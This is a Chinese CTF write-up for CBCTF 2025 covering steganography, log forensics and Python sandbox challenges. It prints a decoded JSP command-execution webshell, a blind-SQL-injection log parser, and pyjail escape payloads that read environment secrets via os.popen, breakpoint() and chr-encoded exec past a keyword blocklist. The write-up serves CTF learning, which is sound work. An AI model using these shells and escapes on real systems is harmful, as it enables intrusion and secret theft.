CBCTF 2025


很晚才知道这个比赛,可惜逆向有些题没时间做了……

[TOC]

misc

  • strange_png

    这是一张sheep家的狗狗照片,里面藏了什么呢?

附件. misc.png

既然是藏了什么,不妨先binwalk提取一下试试。注意root提权

1
# binwalk -e --run-as=root misc.png

于是尝试解压CCC66.zip,加密了;分析前面的zlib数据,尝试后也无用

难道要rockyou.txt爆破?那真是疯了

冷静思考,考虑到题目中说的图片,于是把这些多余数据去掉,看能否得到图片

先010 editor找一找边界

结束标志是IEND chunk 即00 00 00 00 49 45 4E 44 AE 42 60 82

1
dd if=misc.png of=clean.png bs=1 count=838757

还是打不开。HxD,发现文件头不对。正确的是89 50 4E 47 0D 0A 1A 0A

补上89 50 4E 47即可

从而得到狗狗图片

可是密码是什么呢?猜想如dog,puppy,sheep,dogdog,123456,666, ,都不对

于是盲猜一手LSB隐写,这里ai推了一个很好用的工具zsteg

1
gem install zsteg

下载后直接

1
zsteg clean.png

尝试30HDdsaHsjfisdf123321解压成功

幸好没爆破,这什么诡异密码:face_with_head_bandage:

打开得到INBEGVCGPN3WK3DDGBWWKX3UN5PW22JVMNPXOMDSGFSCC7I=

1
echo "INBEGVCGPN3WK3DDGBWWKX3UN5PW22JVMNPXOMDSGFSCC7I=" | base32 -d

结果CBCTF{welc0me_to_mi5c_w0r1d!}

  • EZSocialEngineering

    今天rocket瞟到int在看的一个视频, 他觉得很有意思, 这是其中一帧的截图, 你可以帮rocket找出视频的b站id吗? 提交CBCTF{BV号}即可

下载文件,发现右上角明显有up名字Ele实验室,逐个尝试即可

BV号示例:

1
https://www.bilibili.com/video/BV1KQ4y117nq/?spm_id_from=333.1387.upload.video_card.click&vd_source=7119de8ded3d49fa9f82ff02e78fa678

BV1KQ4y117nq就是本题的BV号。

于是CBCTF{BV1KQ4y117nq}

  • Realworld-HackVcenter

某个APT(高级持续性威胁)组织试图攻击某高校的校园网络的Hypervisor管理器, 但是该校的网安社团早有预警, 并已经部署某个程序在背后观察着该APT组织的一举一动并准备反制, 现在你作为社团的一员, 请你协助找出一些线索.

提交flag时把flag{}替换为CBCTF{}

notepad打开,这一大段应该很醒目

1
$logger.warn(\"\\u003c\\u0025\\u0040\\u0020\\u0070\\u0061\\u0067\\u0065\\u0020\\u0069\\u006d\\u0070\\u006f\\u0072\\u0074\\u003d\\u0022\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u002a\\u002c\\u006a\\u0061\\u0076\\u0061\\u002e\\u0069\\u006f\\u002e\\u002a\\u0022\\u0025\\u003e\\u000a\\u003c\\u0068\\u0074\\u006d\\u006c\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u003c\\u0062\\u006f\\u0064\\u0079\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u003c\\u0066\\u006f\\u0072\\u006d\\u0020\\u006d\\u0065\\u0074\\u0068\\u006f\\u0064\\u003d\\u0022\\u0067\\u0065\\u0074\\u0022\\u003e\\u000a\\u0009\\u0009\\u003c\\u0069\\u006e\\u0070\\u0075\\u0074\\u0020\\u0074\\u0079\\u0070\\u0065\\u003d\\u0022\\u0074\\u0065\\u0078\\u0074\\u0022\\u0020\\u006e\\u0061\\u006d\\u0065\\u003d\\u0022\\u0063\\u006d\\u0064\\u0022\\u0020\\u0076\\u0061\\u006c\\u0075\\u0065\\u003d\\u0022\\u0066\\u006c\\u0061\\u0067\\u007b\\u0035\\u0037\\u0033\\u0038\\u0039\\u0030\\u0038\\u0034\\u0037\\u0039\\u0030\\u0031\\u0038\\u0034\\u0037\\u0039\\u0038\\u0031\\u0032\\u0037\\u0039\\u0030\\u0038\\u007d\\u0022\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u003c\\u0069\\u006e\\u0070\\u0075\\u0074\\u0020\\u0074\\u0079\\u0070\\u0065\\u003d\\u0022\\u0073\\u0075\\u0062\\u006d\\u0069\\u0074\\u0022\\u0020\\u0076\\u0061\\u006c\\u0075\\u0065\\u003d\\u0022\\u0053\\u0065\\u006e\\u0064\\u0022\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u003c\\u002f\\u0066\\u006f\\u0072\\u006d\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u003c\\u0070\\u0072\\u0065\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u003c\\u0025\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0069\\u0066\\u0020\\u0028\\u0072\\u0065\\u0071\\u0075\\u0065\\u0073\\u0074\\u002e\\u0067\\u0065\\u0074\\u0050\\u0061\\u0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u0072\\u0028\\u0022\\u0063\\u006d\\u0064\\u0022\\u0029\\u0020\\u0021\\u003d\\u0020\\u006e\\u0075\\u006c\\u006c\\u0029\\u0020\\u007b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u006f\\u0075\\u0074\\u002e\\u0070\\u0072\\u0069\\u006e\\u0074\\u006c\\u006e\\u0028\\u0022\\u0043\\u006f\\u006d\\u006d\\u0061\\u006e\\u0064\\u003a\\u0020\\u0022\\u0020\\u002b\\u0020\\u0072\\u0065\\u0071\\u0075\\u0065\\u0073\\u0074\\u002e\\u0067\\u0065\\u0074\\u0050\\u0061\\u0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u0072\\u0028\\u0022\\u0063\\u006d\\u0064\\u0022\\u0029\\u0020\\u002b\\u0020\\u0022\\u003c\\u0042\\u0052\\u003e\\u0022\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0050\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u0020\\u0070\\u0020\\u003d\\u0020\\u0052\\u0075\\u006e\\u0074\\u0069\\u006d\\u0065\\u002e\\u0067\\u0065\\u0074\\u0052\\u0075\\u006e\\u0074\\u0069\\u006d\\u0065\\u0028\\u0029\\u002e\\u0065\\u0078\\u0065\\u0063\\u0028\\u0072\\u0065\\u0071\\u0075\\u0065\\u0073\\u0074\\u002e\\u0067\\u0065\\u0074\\u0050\\u0061\\u0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u0072\\u0028\\u0022\\u0063\\u006d\\u0064\\u0022\\u0029\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u004f\\u0075\\u0074\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0020\\u006f\\u0073\\u0020\\u003d\\u0020\\u0070\\u002e\\u0067\\u0065\\u0074\\u004f\\u0075\\u0074\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0028\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0020\\u0069\\u006e\\u0020\\u003d\\u0020\\u0070\\u002e\\u0067\\u0065\\u0074\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0028\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0044\\u0061\\u0074\\u0061\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0020\\u0064\\u0069\\u0073\\u0020\\u003d\\u0020\\u006e\\u0065\\u0077\\u0020\\u0044\\u0061\\u0074\\u0061\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0028\\u0069\\u006e\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0020\\u0064\\u0069\\u0073\\u0072\\u0020\\u003d\\u0020\\u0064\\u0069\\u0073\\u002e\\u0072\\u0065\\u0061\\u0064\\u004c\\u0069\\u006e\\u0065\\u0028\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0077\\u0068\\u0069\\u006c\\u0065\\u0020\\u0028\\u0020\\u0064\\u0069\\u0073\\u0072\\u0020\\u0021\\u003d\\u0020\\u006e\\u0075\\u006c\\u006c\\u0020\\u0029\\u0020\\u007b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u006f\\u0075\\u0074\\u002e\\u0070\\u0072\\u0069\\u006e\\u0074\\u006c\\u006e\\u0028\\u0064\\u0069\\u0073\\u0072\\u0029\\u003b\\u0020\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0064\\u0069\\u0073\\u0072\\u0020\\u003d\\u0020\\u0064\\u0069\\u0073\\u002e\\u0072\\u0065\\u0061\\u0064\\u004c\\u0069\\u006e\\u0065\\u0028\\u0029\\u003b\\u0020\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u007d\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u007d\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0025\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u003c\\u002f\\u0070\\u0072\\u0065\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u003c\\u002f\\u0062\\u006f\\u0064\\u0079\\u003e\\u000a\\u003c\\u002f\\u0068\\u0074\\u006d\\u006c\\u003e\\u000a\")##   
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
import re
import sys
import argparse

def decode_unicode(text):
"""解码Unicode转义序列"""
# 替换双反斜杠为单反斜杠
text = text.replace('\\\\', '\\')

# 解码Unicode序列
def decode_match(match):
hex_str = match.group(1)
try:
return chr(int(hex_str, 16))
except:
return match.group(0)

# 匹配各种Unicode格式
result = re.sub(r'\\u([0-9a-fA-F]{4})', decode_match, text)
result = re.sub(r'\\U([0-9a-fA-F]{8})', decode_match, result)
result = re.sub(r'\\x([0-9a-fA-F]{2})', decode_match, result)

return result

def main():
parser = argparse.ArgumentParser(description='解码Unicode转义序列')

# 修改参数定义,允许多个参数合并
parser.add_argument('text', nargs='*', help='要解码的文本(可多部分)')
parser.add_argument('-f', '--file', help='从文件读取文本')
parser.add_argument('-s', '--save', action='store_true', help='保存到ascii.txt')
parser.add_argument('-o', '--output', help='指定输出文件名')

args = parser.parse_args()

# 获取输入文本
input_text = ""

if args.file:
# 从文件读取
try:
with open(args.file, 'r', encoding='utf-8') as f:
input_text = f.read()
except Exception as e:
print(f"读取文件失败: {e}")
return
elif args.text:
# 将命令行多个部分合并
input_text = " ".join(args.text)
else:
# 从标准输入读取
print("请输入文本(Ctrl+Z结束输入):")
try:
input_text = sys.stdin.read()
except KeyboardInterrupt:
return

if not input_text.strip():
print("错误:没有输入文本")
return

# 解码文本
decoded = decode_unicode(input_text)

# 输出结果
print("=" * 60)
print("解码结果:")
print("=" * 60)
print(decoded)
print("=" * 60)

# 保存文件
if args.save or args.output:
filename = args.output if args.output else "ascii.txt"
try:
with open(filename, 'w', encoding='utf-8') as f:
f.write(decoded)
print(f"✓ 已保存到: {filename}")
except Exception as e:
print(f"✗ 保存失败: {e}")

if __name__ == "__main__":
main()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
PS C:\Users\Rekjo\Desktop\misc\useful_scripts> python unicode.py "$logger.warn(\"\\u003c\\u0025\\u0040\\u0020\\u0070\\u0061\\u0067\\u0065\\u0020\\u0069\\u006d\\u0070\\u006f\\u0072\\u0074\\u003d\\u0022\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u002a\\u002c\\u006a\\u0061\\u0076\\u0061\\u002e\\u0069\\u006f\\u002e\\u002a\\u0022\\u0025\\u003e\\u000a\\u003c\\u0068\\u0074\\u006d\\u006c\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u003c\\u0062\\u006f\\u0064\\u0079\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u003c\\u0066\\u006f\\u0072\\u006d\\u0020\\u006d\\u0065\\u0074\\u0068\\u006f\\u0064\\u003d\\u0022\\u0067\\u0065\\u0074\\u0022\\u003e\\u000a\\u0009\\u0009\\u003c\\u0069\\u006e\\u0070\\u0075\\u0074\\u0020\\u0074\\u0079\\u0070\\u0065\\u003d\\u0022\\u0074\\u0065\\u0078\\u0074\\u0022\\u0020\\u006e\\u0061\\u006d\\u0065\\u003d\\u0022\\u0063\\u006d\\u0064\\u0022\\u0020\\u0076\\u0061\\u006c\\u0075\\u0065\\u003d\\u0022\\u0066\\u006c\\u0061\\u0067\\u007b\\u0035\\u0037\\u0033\\u0038\\u0039\\u0030\\u0038\\u0034\\u0037\\u0039\\u0030\\u0031\\u0038\\u0034\\u0037\\u0039\\u0038\\u0031\\u0032\\u0037\\u0039\\u0030\\u0038\\u007d\\u0022\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u003c\\u0069\\u006e\\u0070\\u0075\\u0074\\u0020\\u0074\\u0079\\u0070\\u0065\\u003d\\u0022\\u0073\\u0075\\u0062\\u006d\\u0069\\u0074\\u0022\\u0020\\u0076\\u0061\\u006c\\u0075\\u0065\\u003d\\u0022\\u0053\\u0065\\u006e\\u0064\\u0022\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u003c\\u002f\\u0066\\u006f\\u0072\\u006d\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u003c\\u0070\\u0072\\u0065\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u003c\\u0025\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0069\\u0066\\u0020\\u0028\\u0072\\u0065\\u0071\\u0075\\u0065\\u0073\\u0074\\u002e\\u0067\\u0065\\u0074\\u0050\\u0061\\u0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u0072\\u0028\\u0022\\u0063\\u006d\\u0064\\u0022\\u0029\\u0020\\u0021\\u003d\\u0020\\u006e\\u0075\\u006c\\u006c\\u0029\\u0020\\u007b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u006f\\u0075\\u0074\\u002e\\u0070\\u0072\\u0069\\u006e\\u0074\\u006c\\u006e\\u0028\\u0022\\u0043\\u006f\\u006d\\u006d\\u0061\\u006e\\u0064\\u003a\\u0020\\u0022\\u0020\\u002b\\u0020\\u0072\\u0065\\u0071\\u0075\\u0065\\u0073\\u0074\\u002e\\u0067\\u0065\\u0074\\u0050\\u0061\\u0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u0072\\u0028\\u0022\\u0063\\u006d\\u0064\\u0022\\u0029\\u0020\\u002b\\u0020\\u0022\\u003c\\u0042\\u0052\\u003e\\u0022\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0050\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u0020\\u0070\\u0020\\u003d\\u0020\\u0052\\u0075\\u006e\\u0074\\u0069\\u006d\\u0065\\u002e\\u0067\\u0065\\u0074\\u0052\\u0075\\u006e\\u0074\\u0069\\u006d\\u0065\\u0028\\u0029\\u002e\\u0065\\u0078\\u0065\\u0063\\u0028\\u0072\\u0065\\u0071\\u0075\\u0065\\u0073\\u0074\\u002e\\u0067\\u0065\\u0074\\u0050\\u0061\\u0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u0072\\u0028\\u0022\\u0063\\u006d\\u0064\\u0022\\u0029\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u004f\\u0075\\u0074\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0020\\u006f\\u0073\\u0020\\u003d\\u0020\\u0070\\u002e\\u0067\\u0065\\u0074\\u004f\\u0075\\u0074\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0028\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0020\\u0069\\u006e\\u0020\\u003d\\u0020\\u0070\\u002e\\u0067\\u0065\\u0074\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0028\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0044\\u0061\\u0074\\u0061\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0020\\u0064\\u0069\\u0073\\u0020\\u003d\\u0020\\u006e\\u0065\\u0077\\u0020\\u0044\\u0061\\u0074\\u0061\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0028\\u0069\\u006e\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0020\\u0064\\u0069\\u0073\\u0072\\u0020\\u003d\\u0020\\u0064\\u0069\\u0073\\u002e\\u0072\\u0065\\u0061\\u0064\\u004c\\u0069\\u006e\\u0065\\u0028\\u0029\\u003b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0077\\u0068\\u0069\\u006c\\u0065\\u0020\\u0028\\u0020\\u0064\\u0069\\u0073\\u0072\\u0020\\u0021\\u003d\\u0020\\u006e\\u0075\\u006c\\u006c\\u0020\\u0029\\u0020\\u007b\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u006f\\u0075\\u0074\\u002e\\u0070\\u0072\\u0069\\u006e\\u0074\\u006c\\u006e\\u0028\\u0064\\u0069\\u0073\\u0072\\u0029\\u003b\\u0020\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0064\\u0069\\u0073\\u0072\\u0020\\u003d\\u0020\\u0064\\u0069\\u0073\\u002e\\u0072\\u0065\\u0061\\u0064\\u004c\\u0069\\u006e\\u0065\\u0028\\u0029\\u003b\\u0020\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u007d\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u007d\\u000a\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0020\\u0025\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u003c\\u002f\\u0070\\u0072\\u0065\\u003e\\u000a\\u0020\\u0020\\u0020\\u0020\\u003c\\u002f\\u0062\\u006f\\u0064\\u0079\\u003e\\u000a\\u003c\\u002f\\u0068\\u0074\\u006d\\u006c\\u003e\\u000a\")##"
============================================================
解码结果:
============================================================
.warn(\ <%@ page import="java.util.*,java.io.*"%>
<html>
<body>
<form method="get">
<input type="text" name="cmd" value="flag{57389084790184798127908}">
<input type="submit" value="Send">
</form>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</body>
</html>
\)##
============================================================

flag{57389084790184798127908}

注:本题的附件不能用wireshark打开,但有个工具值得注意

根据文件名 443.this.is.mitm.file(暗示端口 443 HTTPS 流量被中间人拦截),这通常是工具 mitmproxy 保存的流量转储文件(Flow Dump)。

因为这是“中间人攻击”(MITM)截获的流量,里面的 HTTPS 流量已经是解密状态。可以通过以下方式来分析:

1
2
sudo apt install mitmproxy ##kali linux
mitmweb -n -r 443.this.is.mitm.file

响应的网页可以在浏览器打开。此工具也可进行类似于wireshark的功能,如过滤、追踪等。

  • EZSqli

简单sqli盲注分析, 但是AES加密

提交flag时把flag{*}替换为CBCTF{*}

notepad看看,里面比较长的若干行还是很醒目的,明显注入了aes_key和iv值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import re
import sys

def extract_aes_key_from_blind_injection(logs):

# 存储每个位置的成功ASCII值
positions = {}

for log in logs:
# 提取位置和ASCII值
match = re.search(r'ASCII\(SUBSTRING\(\(SELECT aes_key FROM sys_conf\),(\d+),1\)\)=\'(\d+)\'', log)
if match:
pos = int(match.group(1))
ascii_val = int(match.group(2))

# 检查响应大小 - 1280表示成功,100表示失败
if '" 200 1280' in log:
positions[pos] = ascii_val

# 按位置排序并转换为字符
aes_key = ''
for pos in sorted(positions.keys()):
ascii_val = positions[pos]
aes_key += chr(ascii_val)

return aes_key

def main():
# 从标准输入读取过滤后的日志
logs = sys.stdin.read().splitlines()

if not logs:
print("没有找到攻击日志")
return

aes_key = extract_aes_key_from_blind_injection(logs)

if aes_key:
print(f"提取的AES密钥: {aes_key}")
print(f"密钥长度: {len(aes_key)} 字符")
print(f"十六进制: {aes_key.encode().hex()}")
else:
print("未能提取AES密钥")

if __name__ == "__main__":
main()

类似方法提取password和iv。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from Crypto.Cipher import AES

aes_key_hex = 'b1c91fe0fc5af04615230c9196b087ff'
aes_iv = '61945a9ac62102c6' # 8字节
password_hash = '5a15c26228ae3af44797eaa4426d8fd498f79ecb2059b592903422eaafc355ab4c105a9e7ab6b5a43195266887779269'

aes_key = bytes.fromhex(aes_key_hex)
encrypted_data = bytes.fromhex(password_hash)

print("最终解密尝试...")
print(f"密钥: {aes_key_hex}")
print(f"IV: {aes_iv}")

# CTR 模式(支持 8 字节 nonce)
try:
cipher = AES.new(aes_key, AES.MODE_CTR, nonce=bytes.fromhex(aes_iv))
decrypted = cipher.decrypt(encrypted_data)
result = decrypted.decode('utf-8', errors='ignore')
print(f"CTR 结果: {result}")
if 'flag' in result.lower():
print("🎯 找到 flag!")
except Exception as e:
print(f"CTR 失败: {e}")

# 如果 CTR 不行,尝试用补全的 IV 进行 CBC
try:
# 补全 IV 到 16 字节
full_iv = bytes.fromhex(aes_iv + '0000000000000000') # 补0
cipher = AES.new(aes_key, AES.MODE_CBC, full_iv)
from Crypto.Util.Padding import unpad
decrypted = unpad(cipher.decrypt(encrypted_data), AES.block_size)
result = decrypted.decode('utf-8', errors='ignore')
print(f"CBC(补0) 结果: {result}")
if 'flag' in result.lower():
print("🎯 找到 flag!")
except Exception as e:
print(f"CBC(补0) 失败: {e}")
  • C!C!B!

从滚木的手机里发现的文件,里面有什么呢?

尝试之后发现是伪加密,注意7z看到里面有两个文件,所以一共是2*2=4个标记需要更改。

解密之后,电棍笑传之.txt:

1
2

然后我猜你可能需要这个:aHR0cHM6Ly9saGxuYi50b3AvaGFqaW1pL2Jhc2U2NA==

base64解码得到网址:https://lhlnb.top/hajimi/base64

打开发现是哈基米语解密,解密结果错误

仔细寻找发现网站下方可以设置密钥,一开始眼神不好没看见,试了半天

密钥必然是在C!C!B!.dll里面,拷打AI得到脚本,原理还不清楚

1
2
3
import ctypes
dll = ctypes.WinDLL('./C!C!B!.dll')
dll.CCB()

powershell运行可得密码:b31915cd51e064bbaf8d6b2790ba108df10c84358f37033cb83609e78e9a3bfb

得到flagCBCTF{y0U_4re_tRULY_a_CCB_mA$TEr}

  • py_jail1

时隔一年,JBNRZ 又搬出了他的陈年老题,相信你一定可以秒了它

这一关,你会 python

1
2
result=__import__('os').popen('env | grep -i flag; cat /proc/self/environ | tr "\\0" "\\n" | grep -i flag').read()
print(result)

FLAG=CBCTF{YOU_cAn-EX3cUTE_THe_SYYyYYStEM_cOMmAnD}

  • py_jail2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
WELCOME = '''
_ _______ _______ _ ____
| | | ____\ \ / / ____| | |___ \
| | | _| \ \ / /| _| | | __) |
| |___| |___ \ V / | |___| |___ / __/
|_____|_____| \_/ |_____|_____| |_____|

'''

print(WELCOME)

print("Welcome to the JBNRZ's pyjail")
print("I'm just a calculator, hhhhhh")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
try:
print("Result: {}".format(eval(input_data)))
except Exception as e:
print(f"Result: {e}")
1
2
__import__('os').popen('env | grep -i flag; cat /proc/self/environ | tr "\\0" "\\n" | grep -i flag').read()
Result: FLAG=CBCTF{wEL1_evAL_fUNCCtiON-iS_NOT-SAF3}
  • py_jail4
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
WELCOME = '''
_ _______ _______ _ _____
| | | ____\ \ / / ____| | |___ /
| | | _| \ \ / /| _| | | |_ \
| |___| |___ \ V / | |___| |___ ___) |
|_____|_____| \_/ |_____|_____| |____/

'''

print(WELCOME)

print("Welcome to the JBNRZ's pyjail")
print("I'm just a calculator, hhhhhh.\nohh, this time with a length limit, it's more secure!")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if len(input_data) > 13:
print("It's too long to eval")
exit(0)
try:
print("Result: {}".format(eval(input_data)))
except Exception as e:
print(f"Result: {e}")
1
2
3
> eval(input())
__import__('os').getenv('FLAG')
Result: CBCTF{oOo_FxXK_THIs-1SsS-NOt-SeCURe}

py_jail 4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
WELCOME = '''
_ _______ _______ _ _ _
| | | ____\ \ / / ____| | | || |
| | | _| \ \ / /| _| | | | || |_
| |___| |___ \ V / | |___| |___ |__ _|
|_____|_____| \_/ |_____|_____| |_|

'''

print(WELCOME)

print("Welcome to the JBNRZ's pyjail")
print("I'm just a calculator, hhhhhh.\nI believe shorter is more secure!")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if len(input_data) > 12:
print("It's too long to eval")
exit(0)
try:
print("Result: {}".format(eval(input_data)))
except Exception as e:
print(f"Result: {e}")
1
2
3
4
5
breakpoint()
--Return--
<string>(1)<module>()->None
(Pdb) !import os; print(os.getenv('FLAG'))
CBCTF{OK-You_aRe_bRe@kPoInT_maStEr}
  • py_jail5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
WELCOME = '''
_ _______ _______ _ ____
| | | ____\ \ / / ____| | | ___|
| | | _| \ \ / /| _| | | |___ \
| |___| |___ \ V / | |___| |___ ___) |
|_____|_____| \_/ |_____|_____| |____/

'''

black = ["input", "import", "os", "open", "popen", "system", "read", "breakpoint", "_", "'", "\""]

print(WELCOME)

print("Welcome to the JBNRZ's pyjail")
print("I'm just a calculator, hhhhhh.\nI banned some dangerous words!")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if any([i in input_data for i in black]):
print("Ohhhh, what are you doing???!!!")
exit(0)
try:
print("Result: {}".format(eval(input_data)))
except Exception as e:
print(f"Result: {e}")
1
2
exec(str().join(map(chr,[105,109,112,111,114,116,32,111,115,59,112,114,105,110,116,40,111,115,46,103,101,116,101,110,118,40,34,70,76,65,71,34,41,41])))
CBCTF{nOoOOoo-You-bREak_MmY_jAil}
  • py_jail6
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
